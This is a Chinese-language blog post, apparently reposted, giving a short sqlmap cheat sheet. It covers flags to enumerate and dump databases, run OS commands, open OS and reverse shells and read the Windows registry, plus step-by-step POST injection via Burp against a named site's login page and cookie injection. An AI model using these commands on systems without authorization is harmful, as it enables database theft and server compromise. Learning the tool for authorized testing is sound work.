zoukankan      html  css  js  c++  java
  • SQLMAP用法

    基本用法:

      --dbs  查询数据库

      --current--db  获取当前数据库名称

      --current--user 获得用户

      --tables -D “数据库”   // 列举数据库的表名

      --columns -T “表名” -D “数据库”   // 获取表的列名

      --dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列

      –privileges / 查看权限

      privileges -U root / 查看用户权限

      –roles / 枚举数据库用户角色

      --proxy "http://127.0.0.1:8080" 代理注入

      --sql-query=xx 要执行的SQL语句

      --sql-shell 提示交互式 SQL 的 shell

      --os-cmd=xxx执行操作系统命令
      --os-shell 交互式的操作系统的 shell
      --os-pwn 反弹shell
      --reg-read 读取win系统注册表
      --dbs-o "sqlmap.log" 保存进度
      --dbs-o "sqlmap.log" -resume 恢复已保存进度

    POST注入   

      1. 浏览器打开目标地址http:// blog.websafe3.org /Login.asp
      2. 配置burp代理(127.0.0.1:8080)以拦截请求
      3. 点击login表单的submit按钮
      4. 这时候Burp会拦截到了我们的登录POST请求
      5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下

      6. 运行sqlmap并使用如下命令:

      ./sqlmap.py -r search-test.txt -p tfUPass  

      这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt,
      而-p 大家应该比较熟悉,指定注入用的参数。

    COOKIES注入

      sqlmap.py -u "http://127.0.0.1/base.php" --cookies "id=1" --dbs --level 2

      默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用--level 参数且数值>=2的时候也会检查 cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 --level 2 即可

  • 相关阅读:
    CodeForces 288A Polo the Penguin and Strings (水题)
    CodeForces 289B Polo the Penguin and Matrix (数学,中位数)
    CodeForces 289A Polo the Penguin and Segments (水题)
    CodeForces 540C Ice Cave (BFS)
    网站后台模板
    雅图CAD
    mbps
    WCF学习-协议绑定
    数据库建表经验总结
    资源位置
  • 原文地址:https://www.cnblogs.com/pangya/p/8915692.html
Copyright © 2011-2022 走看看